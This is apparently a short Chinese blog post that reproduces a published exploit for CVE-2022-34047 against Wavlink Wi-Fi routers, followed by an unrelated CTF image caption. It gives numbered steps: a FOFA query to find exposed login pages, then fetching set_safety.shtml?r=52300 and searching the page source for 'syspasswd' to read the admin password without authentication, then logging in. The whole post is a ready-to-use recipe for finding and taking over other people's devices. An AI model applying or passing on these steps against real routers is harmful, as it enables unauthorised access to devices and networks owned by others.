一、fofa 搜索 title=“Wi-Fi APP Login”

# Date: 2022-06-12
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: M30HG4.V5030.191116
# Vendor home page : wavlink.com
# Authentication Required: No
# CVE : CVE-2022-34047
# Tested on: Windows
# Exploit
view-source:http://IP_address/set_safety.shtml?r=52300
search for var syspasswd="
you will find the username and the password
二、右键查看源码

三、再url后追加set_safety.shtml?r=52300 搜索syspasswd

四、用得到的密码进行登录



















![[CTF/网络安全] 攻防世界 baby_web 解题详析](https://img-blog.csdnimg.cn/d51762d320ec4c2b8c4f9c5aafd4a7db.png#pic_center)
